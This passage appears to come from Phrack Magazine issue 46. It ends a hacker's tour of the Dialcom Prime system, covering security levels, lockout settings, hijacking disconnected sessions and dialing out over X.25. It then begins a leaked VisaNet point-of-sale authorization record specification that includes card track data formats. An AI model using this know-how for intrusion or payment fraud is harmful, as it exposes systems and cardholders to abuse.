each user can access. A foreign correspondent for a magazine might
have access to the news services while other users might not. The
administrator also determines how much the user can interface with
the Prime OS itself. Each user can run a few basic commands (list
files, delete, sign off) but above that, it's up to the administrator.
The administrator may opt to remove a user from the controlling menuing
system -- in which case, the user has no restrictions forced upon him.
Group administrators, however, handle only their groups, and not the
Dialcom system. They need, for example, to notify Dialcom staff if
they want an account removed from the system.
Another (different yet combined) part of the account/group security
are accounts' ``security levels'' (seclevs). Seclevs range from 3
to 7, and determine the access an account has to various places.
Seclev 4 users, for example, are not restricted to seeing only users
of their group on the system, and can delete accounts from the menuing
system.
User accounts own their directories and files within (but high seclevs
can read other users' files). Each account's security is left in some
extent to its owner, in that the user sets his own password. When
setting a password, a user can set a secondary password. Any user wishing
to access that user's directory will need that password. Furthermore,
the user can allow other users to attach as owners to his directory if
they know his password (come to think of it, couldn't they just login
as him?). This is all controlled by the PASSWD program (see ``Common
Commands'', below).
Dialcom also allows for login attempt security using the NET_LOCK
program. NET_LOCK blocks login attempts from addresses that have
registered too many login failures over a period of time (the default
being blocking for 10 minutes of addresses that have registered more
than 10 failed login within 5 minutes). NET_LOCK -DISPLAY is accessible
to users of Seclev 5 and shows addresses currently blocked and general
information. Other options are accessible to Seclev 7 and are:
-ON, -OFF, -ATTEMPTS (number of attempts so that NET_LOCK will block
an address), -LOCK_PERIOD (the period in which these attempts must
occur), -LOCK_TIME (time to block), -WINDOW (a time window in which the
lockout feature is disabled).
A little unrelated is the network reconnect feature of the Prime
computers. When a user gets disconnected from the system because
of a network failure, or for any other reason which is not the
system's fault, he can log back in and reconnect into the disconnected
job. When this happens, the user sees, upon logging on:
You Have a Disconnected Job:
HBT007 d09 1 109 NT NETLINK 989898989 6 3
Do You Want to Reconnect?
Which means user's HBT007 job #9 (a NETLINK command) is waiting for
a reconnection. At this point, the user can continue, leaving the
job to hang until the system signs it off when a certain amount of
time expires; sign the job off himself; or reconnect to that job.
(Try "HELP" at the prompt.) This wouldn't be important, but experience
shows that many disconnections occur when someone logs into Dialcom
over a network, and then uses NETLINK (or another program) to connect
to another site over a network, and somewhere, some time, he issues
a control sequence (let's say to tell NETLINK to do something) that
gets processed by the first network, which logs him off. So there
is potential to log into the middle of people's sessions (yeah, like
detached ttys).
Common Commands
~~~~~~~~~~~~~~
Common commands are in reality the basic Prime commands that every
account has access to. Here they are, in alphabetical order.
`CLEAR' Clear the screen.
`DATE' Shows the date at which a command was entered. Output:
>DATE
Proceed to next command
>BAH
Friday, June 38, 1994 10:01:00 AM EDT
`DEL' Deletes a file.
`DELP' Deletes several files based on wildcards. Can verify deletion
of every file, and delete only file modified before, after, or
between certain dates.
`ED' Is the default and simplest file editor on Dialcom (some of its
brothers are JED and FED). Once invoked, ED enters INPUT mode,
in which the user just types text. To enter EDIT mode, where
you can issue commands, you need to press <CR> on a blank line
(the same thing will get you from EDIT mode back to INPUT mode).
The EDIT mode uses a pointer to a line. All commands are carried
on the line that the pointer points to. "T" will bring the
pointer to the top of the text, "B" to the bottom, "N" to the
next line down, "U" to the next line up, and "L <word>" to
the line containing <word>. ED commands include:
P: PRINT the pointer line. P<number> will print <number>
of lines.
C: Change words. The format is "C/old word/new word".
A: Appends words. The format is "A <words>".
R: Retype pointer line. The format is "R <new line>".
SP: Check the spelling of the text, and then point to
the top of the text.
SAVE: Will save the text and exit ED.
Q: Will quit/abort editing and exit ED.
`F' List all file info. Output:
DIALCOM.TXT 001 13/30/94 13:50 ASC D W R
Which means file name "DIALCOM.TXT", size of 1 file blocks,
lat modified on 13/30/94 at 13:50, is an ASC type file, and
the account has the permissions to D(elete), W(rite), and
R(ead) it.
`HELP' (`?') Displays a nicely formatted menu of available commands.
`INFO' System info. INFO <info-file-name> displays an information
file, for example, INFO NETLINK.
"INFO ?" lists info files.
"INFO BRIEF" lists info files grouped by application
"INFO INFO" lists info files with their descriptions.
`L' List all file names. Output:
<S666-6>HBT007 (Owner)
DIALCOM.TXT
`LS' Display information about available segments and the account's
access to them. Output:
2 Private static segments.
segment access
--------------
4000 RWX
4001 RWX
11 Private dynamic segments.
segment access
--------------
4365 RX
4366 RX
4367 RWX
4370 RWX
4371 RX
4372 RWX
4373 RX
4374 RWX
4375 RX
4376 RX
4377 RWX
`NAME' Changes UFD name. Output:
>NAME
Old Name: John Gacy
UFD Name: Herd Beast
All done
>WHO
Herd Beast <S666-6>HBT007
`NETWORK' Accesses a database that contains dial-up number for Sprintnet,
Tymnet, Datapac and Dialcom's Dialnet by State/City.
`OFF' Sign off the system.
`ONLINE' Who's online? The amount of data displayed depends on the
account's seclev. Seclevs below 4 are restricted to seeing
only users of their group. Output:
HBT007 PRK017 MJR
`PAD' Allows you to send commands to an X.29 PAD, these commands
being the SET/SET?/PAR? commands and their parameter/value
pairs.
`PASSWD' Change your password. PASSWD has two forms: a short one,
which just changes the user's password, and a long form,
invoked by PASSWD -LONG, which allows the user to set
a second password for other users accessing his directory,
and also to determine if they can have owner access to
the directory.
`PROTECT' Protects a file (removes permissions from it).
"PROTECT DIALCOM.TXT" will remove all three (D, W, R)
attributes from it. This will result in:
>DEL DIALCOM.TXT
Insufficient access rights. DIALCOM.TXT (DEL:10)
But --
>DELETE DIALCOM.TXT
"DIALCOM.TXT" protected, ok to force delete? y
`SECLEV' Your security level. Output:
Seclev=5
`SIZE' Size information about a file. Output:
1 Block, 404 Words
`STORAGE' Shows storage information.
`SY' Show users on system. (Same restrictions as for ONLINE apply.)
Will show user name, time on, idle time, devices used, current
jobs and state, etc. Output:
41 Users on sys 666
Names use idle mem State command object devs
HBT007 *11 0 155 R1 SY 6 3 from Tymnet via X.25
`SYS' Displays account information and system number. Output:
<S666-6>HBT007 on system 666.
`TERM' Used to tell the Dialcom computer what terminal the user is
using. A list of supported terminals is generated by "TERM
TERMINALS". TERM options are:
TYPE <terminal type> (TYPE VT100)
WIDTH <width> (Terminal width, if different
than default)
TOP (Start listings at top of screen)
PAUSE (Pause listings when screen is
full)
-ERASE, -KILL <char> (Sets the erase or kill character)
-BREAK <ON|OFF> (Enables or disables BREAKs)
-HALF or -FULL (Half duplex of full duplex)
-DISPLAY (Output current terminal information)
`WHO' Displays account information. Output:
<S666-6>HBT007
Which means user HBT007 on system 666 on device 6.
Communicating on Dialcom
~~~~~~~~~~~~~~~~~~~~~~~
Users who want to communicate on Dialcom have two choices, basically.
These are the Dialcom bulletin board and electronic mail. The Dialcom
bulletin board has two versions. The first consists of several message
bases (called ``categories'') which are shared between some Dialcom
systems (and mostly used by bored employees, it seems); there are also
private bulletin boards, which are not shared between the systems. They
belong to account groups, and only users in an account group can access
that group's bulletin board system. These version of the Dialcom board
are often empty (they have no categories defined and hence are unusable).
This is accessed by the command POST (PRPOST for the private board).
Once POST is activated, it will display a prompt:
Send, Read or Purge:
If the answer is READ, POST will ask for a category (a list of categories
will be displayed if you type HELP at that prompt). Once a category
has been joined, you will be able to read through the messages there:
Subject: ?
From: HBT007 Posted: Sat 32-July-94 16:47 Sys 666
quit
/q
/quit
Continue to Next Item?
Answering SEND at the first prompt will allow you to send a message in a
category.
Answering PURGE will allow you to delete messages post by your account.
When you enter PURGE and the category to purge message from, the system
will show you any posts that you are allowed to purge, followed by a
"Disposition:" prompt. Enter DELETE to delete the message.
The second way to communicate is the Dialcom MAIL system. MAIL allows
sending and receiving messages, it allows for mailing lists, filing
mail into categories, holding mail to read later and so on. MAIL is
invoked by entering, uh... oh, yes, MAIL.
It works along similar lines to those of POST, and will display the following
prompt:
Send, Read or Scan:
SEND: Allows you to send a message. It will prompt with "To:",
"Subject:" and "Text:" (where you enter the actual message, followed
by ".SEND" on a blank line to end). After a message is sent, the
"To:" prompt will appear again -- use "QUIT" to leave it.
A word about the "To:" prompt. There are two configuration files which
make its use easier. First the MAIL.REF file, which is really a mailing
list file. It contains entries in the format of --
<Nick> <Accounts>
DOODZ DVR014 ABC0013 XYZ053
-- and at the "To:" prompt, you can just enter "DOODZ" and the message
will be sent to all three accounts. When you enter a name, MAIL searches
through your MAIL.REF, and then through the account administrator's, and
only then parses it as an account name. Second is the mail directory,
which contains the names and account IDs of many users the account is
in contact with. To display it, type "DIS DIR" at the first prompt.
You'll get something like this:
HERD-BEAST 6666:HBT007 WE'RE BAD AND WE'RE KRAD
Which means you can type "HERD-BEAST" at the prompt, and not just
HBT007. Also, there are special options for the "To:" prompt, most
notable are: CC to send a carbon copy; EX to send the message with
``express priority''; DAR to request that if the message is sent
to a user on another Dialcom system, POSTMASTER will send you a
message verifying that your message has been sent; and NOSHOW,
to keep the receiver from seeing everybody else on the "To:" list.
For example (all these people are in the mail directory),
To: DUNKIN D.DREW CC FOLEY NOSHOW EX
You enter the message about to be sent at the "Text:" prompt. That
mode accepts several commands (like .SEND), all of which begin with a
dot. Any command available at the "To:" prompt is available here.
For example, you can add or remove names from to "To:" field using
".TO <ids>" or ".TO -<ids>", and add a CC using ".CC <id>".
You also have a display command, ".DIS". ".DIS" alone shows the text
entered so far; ".DIS TO" shows the "To:" field; ".DIS HE" shows
the entire header; etc. Finally, you have editing option. ".ED" will
load editing mode, so you can change the text you entered. ".LOAD
<filename>" will load <filename> into the text of the message. ".SP"
will check the spelling of text in the message, and there are other
commands.
READ: Allows you to read mail in your mailbox. Once you enter READ,
MAIL will display the header of the first message in your mailbox
(or "No mail at this time") followed by a "--More--" prompt. To
read the message, press <CR>; otherwise, enter NO. After you are done
reading a message, you will be prompted with the "Disposition:" prompt,
where you must determine what to do with the message. There you can enter
several commands: AGAIN to read the message again; AG HE to read the
header again; AP REPLY to reply to the message and append the original
message to the reply; AP FO to forward the message to someone and add
your comments to it; REPLY to reply to the sender of the message; REPLY
ALL to reply to everybody on the "To:" field; FILE to file the message;
SA to save the message into a text file; NEXT to read the next message
in your mailbox; and D to delete the message.
SCAN: Allows you see a summary of the messages in the mailbox. Both
READ and SCAN have options that allow you to filter the messages you
want to read: FR <ids> to get only messages from <ids>; TO <ids> to
get only messages sent to <ids>; 'string' to get only messages containing
``string'' in the "Subject:" field; "string" to get only messages
containing ``string'' in the message itself; FILE CATEGORY to get only
messages filed into ``CATEGORY''; and DA Month/Day/Year to get only messages
in that date (adding a '-' before or after the date will get you everything
before or after that date, and it's also possible to specify two dates
separated by a '-' to get everything between those dates. For example,
to get all of Al Gore's messages about Clipper before August 13th:
READ FILE CLIPPER FR GOR 'Great stuff' DA -8/13/94
There is also a QS (QuickScan) command that behaves the same as SCAN,
only SCAN shows the entire header, and QS just shows the "From:" field.
However, there is more to do here than just send, read or scan.
Some of it was mentioned when explaining these commands. Both sent
and received messages can be saved into a plain text file or into
a special mailbox file, called MAIL.FILE. Messages filed into the
MAIL.FILE can be grouped into categories in that file.
SAVING MESSAGES: Messages are saved by entering "SA filename" at a
prompt. For sent message, it's the "Text:" prompt, while entering the
message, and the command is ".SA", not "SA". For received message, it's
either the "--More--" or the "Disposition:" prompt.
FILING MESSAGES: Messages are filed in two cases. First, the user
can file any message into any directory, and second, the system files
read messages that lay in the mailbox for over 30 days. Received messages
are filed by entering "FILE" at the "Disposition:" prompt. This files
the message into a miscellaneous category called BOX. If an optional
<category-name> is added after "FILE", the message will be filed into
that category. If <category-name> doesn't exist, MAIL can create it
for you. After a message has been filed, it's not removed from the
mailbox -- that's up to the user to do. Sent messages behaved the same
way, but the command is ".FILE" from the "Text:" prompt.
To display categories of filed mail, enter DIS FILES at a prompt. To
read or scan messages in filed, just add "FILE <category-name> after
the command (READ, SCAN, etc). To delete a category, enter D FILE
<category-name>. To delete a single message in a category, just use
D as you would on any other message, after you read it from the
MAIL.FILE.
Connecting via Dialcom
~~~~~~~~~~~~~~~~~~~~~
Dialcom allows its customers to access other systems through it.
There are some services offered specifically through Dialcom, such as
the BRS/MENUS service, which is an electronic library with databases
about many subjects, Telebase's Cyclopean Gateway Service, which offers
access to many online database services (like Newsnet, Dialog and even BRS)
and more. These services have a direct connection to Dialcom and software
that maps Dialcom user ids to their own ids (it's not usually possible for
someone to access one of these services without first connecting to Dialcom).
Another method is general connection to X.25 addresses. Since Dialcom
is connected to X.25, and it allows users to use the Prime NETLINK
commands, it's possible to PAD out of Dialcom!!#!
NETLINK is invoked by entering NETLINK. NETLINK then displays its own,
'@' prompt. The commands available there are QUIT, to quit back to
the OS; CONTINUE, to return to an open connection; CALL, to call an
address; and D, to disconnect an open connection.
CALL takes addresses in several formats. A system name, to connect to
a Dialcom system, or an address in the format of DNIC:NUA. For example,
@ CALL :666
Circuit #1
666 Connected
[...]
@ CALL 3110:21300023
Circuit #2
21300023 Connected
[...]
NETLINK establishes connections in the form of circuits. A circuit can
be broken out of into command mode (the '@' prompt), using "<CR>@<CR>",
and another can be opened, or parameters can be changed, etc.
NETLINK has other commands, to log connections into a file, or set PAD
parameters (SET, PAR), or turn on connection debugging, or change
the default '@' prompt, and more.
Things to Do on Dialcom
~~~~~~~~~~~~~~~~~~~~~~
Much of what Dialcom offers was not covered until now and will not
be covered. That's because most the services could use a file each,
and because many account groups have things enabled or disabled
just for them. Instead, I will write shortly about two of the more
interesting things online, the news service and clipping service,
and add pointers to some interesting commands to try out.
The news service, accessed with the NEWS command, is a database of
newswires from AP, Business Wire, UPI, Reuters and PR Newswire.
The user enters the database, and can search for news by keywords.
After entering NEWS, you will see a menu of all the news agencies.
Once you choose an agency, you will enter its menu, which sometimes
contains a copyright warning and terms of usage and also the list
of news categories available from that agency (National, North America,
Business, Sports, etc). Once you choose the category, you will be
asked for the keyword to search for. If a story (or several stories) was
found containing your desired keyword, you can read through the
stories in the order of time, or the order they appear, or reverse
order and so on, and finally mail a story to yourself, or enter new
search keywords, or jump to another story, or simply quit.
The news clipping service, available with the command NEWSTAB, allows
the user to define keyword-based rules for selecting news clippings.
The system then checks every newswire that passes through it, and if
it matches the rules, mails the newswire to the user.
After entering NEWSTAB, you are presented with a menu that allows you
to show, add, delete, and alter your rules for choosing news. The rules
are made using words or phrases, logical operators, wildcards and
minimal punctuation. A rule can be as simple as "HACKING", which will
get every newswire with the word "hacking" in it mailed to you, or
if you want to be more selective, "NASA HACKING". Logical operators
are either AND or OR. For example, "HACKING AND INTERNET". Wildcards
are either '*' or '?' (both function as the same). They simple replace
any number of letters. Punctuation is permitted for initials,
abbreviations, apostrophes or hyphens, but not for question marks and
similar. All of this is explained in the NEWSTAB service itself.
For the file hungry, Dialcom offers several file transfer programs,
including KERMIT and Dialcom's FT, which implements most popular
protocols, like Zmodem, Xmodem, etc.
A small number of other fun things to try:
NET-TALK The ``interactive computer conferencing system'' -- build
your private IRC!
CRYPTO Dialcom's encryption program. Something they're probably
going to love on sci.crypt.
NUSAGE By far one of the better things to do on Dialcom, it was
left out of this file because it is simply huge. This
program allows the user (typically an administrator) to
monitor network usage, sort the data, store it, peek
into all the little details (virtual connection types,
remote/local addresses, actions, time, commands, etc).
Unfortunately, it's completely beyond the scope of this
file, as there are tons of switches and options to use
in order to put this program to effective use.
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 15 of 28
****************************************************************************
visanetoperations; part1
obtainedandcompiled
by
icejey
/\
lowerfeldafederationforundercasing iiu delamolabz chuchofthenoncomformist
&&
theilluminatibarbershopquartet
greetz2; drdelam maldoror greenparadox kaleidox primalscream reddeath kerryk
-------------------------- [ typed in true(c) 80 columns] ----------------------
---------------------------- [ comments appear in []s ] ------------------------
[ section one ]
[ from the word of god ]
-------------------------------------------------------------
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
| \\\\\ ///// ///// //////////// /////\\\\ |
| \\\\\ ///// ///// ///// ///// \\\\\ |
| \\\\\ ///// ///// /////////// \\\\\\\\\\\\\\ |
| \\\\\/// ///// ///// \\\\\\\\\\\\\\\\ |
| \\\\\/ ///// //////////// ///// \\\\\ |
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
| XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX |
-------------------------------------------------------------
EXTERNAL INTERFACE SPECIFICATION
--------------------------------
SECOND GENERATION
AUTHORIZATION RECORD FORMATS
For Record Formats
--------------------------
J - PS/2000 REPS
G - VisaNet Dial Debit
1.0 INTRODUCTION
2.0 APPLICABLE DOCUMENTS
2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
3.0 AUTHORIZATION RECORD FORMATS
3.01 REQUEST RECORD FORMAT
3.02 RESPONSE RECORD FORMAT
4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS
4.01 RECORD FORMAT
4.02 APPLICATION TYPE
4.03 MESSAGE DELIMITER
4.04 ACQUIRER BIN
4.05 MERCHANT NUMBER
4.06 STORE NUMBER
4.07 TERMINAL NUMBER
4.08 MERCHANT CATEGORY CODE
4.09 MERCHANT COUNTRY CODE
4.10 MERCHANT CITY CODE
4.11 TIME ZONE DIFFERENTIAL
4.12 AUTHORIZATION TRANSACTION CODE
4.13 TERMINAL IDENTIFICATION NUMBER
4.14 PAYMENT SERVICE INDICATOR
4.15 TRANSACTION SEQUENCE NUMBER
4.16 CARDHOLDER IDENTIFICATION DATA
4.17 ACCOUNT DATA SOURCE
4.18 CUSTOMER DATA FIELD
4.18.1 TRACK 1 READ DATA
4.18.2 TRACK 2 READ DATA
4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)
4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER
4.18.3.2 MANUALLY ENTERED EXPIRATION DATE
4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER
4.18.4.1 CHECK ACCEPTANCE ID
4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA
4.19 FIELD SEPARATOR
4.20 CARDHOLDER IDENTIFICATION DATA
4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID
4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID
4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID
4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [hmmm...]
4.21 FIELD SEPARATOR
4.22 TRANSACTION AMOUNT
4.23 FIELD SEPARATOR
4.24 DEVICE CODE/INDUSTRY CODE
4.25 FIELD SEPARATOR
4.26 ISSUING INSTITUTION ID/RECEIVING INSTITUTION ID
4.27 FIELD SEPARATOR
4.28 SECONDARY AMOUNT (CASHBACK)
4.29 FIELD SEPARATOR
4.30 MERCHANT NAME
4.31 MERCHANT CITY
4.32 MERCHANT STATE
4.33 SHARING GROUP
4.34 FIELD SEPARATOR
4.35 MERCHANT ABA NUMBER
4.36 MERCHANT SETTLEMENT AGENT NUMBER
4.37 FIELD SEPARATOR
4.38 AGENT NUMBER
4.39 CHAIN NUMBER
4.40 BATCH NUMBER
4.41 REIMBURSEMENT ATTRIBUTE
4.42 FIELD SEPARATOR
4.43 APPROVAL CODE
4.44 SETTLEMENT DATE
4.45 LOCAL TRANSACTION DATE
4.46 LOCAL TRANSACTION TIME
4.47 SYSTEM TRACE AUDIT NUMBER
4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
4.49 NETWORK IDENTIFICATION CODE
4.50 FIELD SEPARATOR
5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
5.01 PAYMENT SERVICE INDICATOR
5.02 STORE NUMBER
5.03 TERMINAL NUMBER
5.04 AUTHORIZATION SOURCE CODE
5.05 TRANSACTION SEQUENCE NUMBER
5.06 RESPONSE CODE
5.07 APPROVAL CODE
5.08 LOCAL TRANSACTION DATE
5.09 AUTHORIZATION RESPONSE CODE
5.10 AVS RESULT CODE
5.11 TRANSACTION IDENTIFIER
5.12 FIELD SEPARATOR
5.13 VALIDATION CODE
5.14 FIELD SEPARATOR
5.15 NETWORK IDENTIFICATION CODE
5.16 SETTLEMENT DATE
5.17 SYSTEM TRACE AUDIT NUMBER
5.18 RETRIEVAL REFERENCE NUMBER
5.19 LOCAL TRANSACTION TIME
6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
6.01 NETWORK IDENTIFICATION CODE
6.02 SETTLEMENT DATE
6.03 SYSTEM TRACE AUDIT NUMBER
7.0 CHARACTER CODE DEFINITIONS
7.01 TRACK 1 CHARACTER DEFINITION
7.02 TRACK 2 CHARACTER DEFINITION
7.03 AUTHORIZATION MESSAGE CHARACTER SET
7.04 CHARACTER CONVERSION SUMMARY
7.05 ACCOUNT DATA LUHN CHECK
7.06 CALCULATING AN LRC
7.07 TEST DATA FOR RECORD FORMAT "J"
7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
7.07.2 RESPONSE MESSAGE FOR TEST DATA
-------------------------------------------------------------------------------
1.0 INTRODUCTION
This document describes the request and response record formats for the VisaNet
second generation Point-Of-Sale (POS) authorization terminals and VisaNet
Authorization services. This document describes only record formats. Other
documents describe communication protocols and POS equipment processing
requirements. Figure 1.0 represents the authorization request which is
transmitted to VisaNet using public communication services and the
authorization response returned by VisaNet. Debit transactions include a
third confirmation message.
POS DEVICE VISANET
---------- -------
AUTHORIZATION
REQUEST
| TRANSMITTED TO A
|----------> VISANET AUTHORIZATION
AUTHORIZATION RESPONSE
HOST SYSTEM |
|
RETURNED BY THE |
VISANET HOST TO <--------|
THE POS TERMINAL
DEBIT RESPONSE
CONFIRMATION--------------->TRANSMITTED TO
HOST SYSTEM
FIGURE 1.0
Authorization request and response.
This document describes the record formats to be used for the development of
new applications. Current formats or transition formats will be provided on
request. The usage of some fields have changed with the new record formats.
Applications which were developed to previous specifications will continue to
be supported by VisaNet services. The new formats and field usage is provided
with the intention of moving all new applications developed to the new formats.
2.0 APPLICABLE DOCUMENTS
The following documents provide additional definitions and background.
2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION
1. EIS1051 - External Interface Specification
Second Generation
Authorization Link Level Protocol
2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE
1. EIS1081 - External Interface Specification
Second Generation
Data Capture Record Formats
2. EIS1052 - External Interface Specification
Second Generation
Data Capture Link Level Protocol
3.0 AUTHORIZATION RECORD FORMATS
This section contains the record formats for the authorization request,
response and confirmation records. The ANSI X3.4 character set is used to
represent all record data elements. (See Section 7)
In the record formats on the following pages, the column heading FORMAT is
defined as:
"NUM" represents numeric data, the numbers 0 through 9, NO SPACES.
"A/N" represents alphanumeric data, the printing character set.
"FS" represents a field separator character as defined in ANSI X3.4 as
a "1C" hex
3.01 REQUEST RECORD FORMAT
Table 3.01b provides the record format for the authorization request records.
Section 4 provides the data element definitions.
The authorization request record is a variable length record. The record
length will depend on the source of the customer data and the type of
authorization request. Refer to Table 3.01c to determine which GROUPS to use
from Table 3.01a
TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY. ALL NEW APPLICATIONS
SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:
RECORD | APPLICATION |
FORMAT | TYPE | REMARKS
-------------------------------------------------------------------------------
J | CREDIT | All non-ATM card transactions (Visa cards, other credit
| | cards, private label credit cards and check guarantee)
G | DIAL DEBIT | Visa supported ATM debit cards
The selection of format type J and G or any other value from Table 3.01a will
depend on the VisaNet services that are desired. Contact your Visa POS member
support representative for assistance in determining the required formats.
TABLE 3.01a
Record Format Summary
Non-CVV CVV Terminal
Compliant Compliant Generation Description
-------------------------------------------------------------------------------
0 RESERVED
1 N First Vutran
2 8 First Sweda
4 R First Verifone
6 P First Amex
7 3 First Racal
A Q First DMC
B R First GTE & Omron [velly intelestink]
C 9 First Taltek
S U First Datatrol - Standard Oil
D T First Datatrol
E RESERVED
5 F Second Non-REPS-Phase 1 CVV
G Second Dial Debit
H Second Non-REPS-Phase 2 CVV
I Second RESERVED - Non-REPS Controller
J Second REPS - Terminal & Controller
K Second RESERVED
L Second RESERVED - Leased VAP
M Second RESERVED - Member Format
N-O RESERVED
V-Y RESERVED
Z Second RESERVED - SDLC Direct [hmmm]
-------------------------------------------------------------------------------
TABLE 3.01b
Second Generation Authorization Request Record Format
see
Group Byte# Length Format Name section
-------------------------------------------------------------------------------
1 1 A/N Record Format 4.01
2 1 A/N Application Type 4.02
3 1 A/N Message Delimiter 4.03
4-9 6 NUM Acquirer Bin 4.04
10-21 12 NUM Merchant Number 4.05
22-25 4 NUM Store Number 4.06
26-29 4 NUM Terminal Number 4.07
30-33 4 NUM Merchant Category Code 4.08
34-36 3 NUM Merchant Country Code 4.09
37-41 5 A/N Merchant City Code (ZIP in the U.S.) 4.10
42-44 3 NUM Time Zone Differential 4.11
45-46 2 A/N Authorization Transaction Code 4.12
47-54 8 NUM Terminal Identification Number 4.13
55 1 A/N Payment Service Indicator 4.14
56-59 4 NUM Transaction Sequence Number 4.15
60 1 A/N Cardholder Identification Code 4.16
61 1 A/N Account Data Field 4.17
Variable 1-76 Customer Data Field 4.18.x
(See: DEFINITIONS in Table 3.01d)
Variable 1 "FS" Field Separator 4.19
Variable 0-32 A/N Cardholder Identification Data 4.20
Variable 1 "FS" Field Separator 4.21
Variable 3-12 NUM Transaction Amount 4.22
Variable 1 "FS" Field Separator 4.23
Variable 2 A/N Device Code/Industry Code 4.24
Variable 1 "FS" Field Separator 4.25
Variable 0-6 NUM Issuing/Receiving Institution ID 4.26
I Variable 1 "FS" Field Separator 4.27
Variable 3-12 NUM Secondary Amount (Cashback) 4.28
II Variable 1 "FS" Field Separator 4.29
Variable 25 A/N Merchant Name 4.30
Variable 13 A/N Merchant City 4.31
Variable 2 A/N Merchant State 4.33
Variable 1-14 A/N Sharing Group 4.33
Variable 1 "FS" Field Separator 4.34
Variable 0-12 NUM Merchant ABA 4.35
Variable 0-4 NUM Merchant Settlement Agent Number 4.36
Variable 1 "FS" Field Separator 4.37
Variable 6 NUM Agent Number 4.38
Variable 6 NUM Chain Number 4.39
Variable 3 NUM Batch Number 4.40
Variable 1 A/N Reimbursement Attribute 4.41
III Variable 1 "FS" Field Separator 4.42
Variable 6 A/N Approval Code 4.43
Variable 4 NUM Settlement Date (MMDD) 4.44
Variable 4 NUM Local Transaction Date (MMDD) 4.45
Variable 6 NUM Local Transaction Time (HHMMSS) 4.46
Variable 6 A/N System Trace Audit Number 4.47
Variable 2 A/N Original Auth. Transaction Code 4.48
Variable 1 A/N Network Identification Code 4.49
IV Variable 1 "FS" Field Separator 4.50
NOTE: The maximum length request can be as long as 290 bytes for an Interlink
Debit Cancel request (including the STX/ETX/LRC). Since some terminals may be
limited to a 256 byte message buffer, the following tips can save up to 36
bytes:
- Limit fields 4.22 and 4.28 to 7 digits
- Fields 4.26, 4.35 and 4.36 are not required for a debit request
- Field 4.33 can be limited to 10 bytes
TABLE 3.01C
Legend for GROUP (from Table 3.01b)
FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD
I II III IV FORMAT
Check guarantee X J
Non-ATM card transactions (Visa cards, other X X J
credit cards, private label credit cards
Visa supported ATM debit cards: Purchase, Return X X X G
and Inquiry Request
Visa supported ATM debit cards: Interlink Cancel X X X X G
Request
TABLE 3.01d
Definitions for Customer Data Field (from Table 3.01b)
Length Format Field Name See
Section
MAGNETICALLY read credit cards (SELECT ONE):
up to 76 A/N Track 1 Read Data 4.18.1
up to 37 NUM Track 2 Read Data 4.18.2
MANUALLY entered credit cards:
up to 28 NUM Manually Entered Account Number 4.18.3.1
1 "FS" Field Separator
4 NUM Manually Entered Expiration Date (MMYY) 4.18.3.2
MACHINE read and MANUALLY entered check acceptance requests:
1 to 28 A/N Check Acceptance ID 4.18.4.1
1 "FS" Field Separator 4.18.4.2
3 to 6 A/N Manually Entered Check Acceptance Data 4.18.4.2
MAGNETICALLY read ATM debit cards:
up to 37 NUM Track 2 Read Data 4.18.2
3.02 RESPONSE RECORD FORMAT
Table 3.02a provides the record format for the authorization response records.
Section 5 provides the data element definitions.
The authorization response record is variable length for record formats "J" &
"G". Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a.
Table 3.02a
Second Generation Authorization Response Record
see
Group Byte# Length Format Name section
--------------------------------------------------------------------------------
1 1 A/N Payment Service Indicator 5.01
2-5 4 NUM Store Number 5.02
6-9 4 NUM Terminal Number 5.03
10 1 A/N Authorization Source Code 5.04
11-14 4 NUM Transaction Sequence Number 5.05
15-16 2 A/N Response Code 5.06
17-22 6 A/N Approval Code 5.07
23-28 6 NUM Local Transaction Date (MMDDYY) 5.08
29-44 16 A/N Authorization Response Message 5.09
45 1 A/N AVS Result Code 5.10
Variable 0/15 NUM Transaction Identifier 5.11
Variable 1 "FS" Field Separator 5.12
Variable 0/4 A/N Validation Code 5.13
I Variable 1 "FS" Field Separator 5.14
Variable 1 A/N Network Identification Code 5.15
Variable 4 NUM Settlement Date (MMDD) 5.16
Variable 6 A/N System Trace Audit Number 5.17
Variable 12 A/N Retrieval Reference Number 5.18
II Variable 6 NUM Local Transaction Time (HHMMSS) 5.19
Table 3.02b
Legend for GROUP (from Table 3.02a)
FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS RECORD
I II FORMAT
All non-ATM card transactions (Visa cards, other credit X J
cards, private label credit cards and check guarantee)
Visa supported ATM debit cards: Purchase, Return, Inquiry X X G
Request and Interlink Cancel Request
3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)
Table 3.03 provides the record format for the second generation debit response
confirmation record. Section 6 provides the data element definitions.
The debit response confirmation record is a fixed length record.
TABLE 3.03
Second Generation Debit Response Confirmation Record
see
Group Byte# Length Format Name section
--------------------------------------------------------------------------------
1 1 A/N Network ID Code 6.01
2-5 4 NUM Settlement Date (MMDD) 6.02
I 6-11 6 A/N System Trace Audit Number 6.03
